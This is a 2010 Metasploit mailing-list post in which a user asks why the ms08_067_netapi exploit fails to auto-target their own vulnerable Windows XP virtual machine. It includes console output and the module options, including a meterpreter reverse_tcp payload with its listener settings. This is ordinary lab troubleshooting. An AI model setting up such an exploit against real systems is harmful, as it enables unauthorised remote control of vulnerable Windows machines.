Metasploit mailing list archives

ms08_067

From: Craig Freyman <craigfreyman () gmail com>
Date: Wed, 2 Jun 2010 10:59:16 -0600

I have a VM that is vulnerable to ms08_067 but the exploit gives me this:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.240.136:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > version
Framework: 3.4.1-dev.9325
Console  : 3.4.1-dev.9372

msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.240.120  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER,
SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.240.136  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting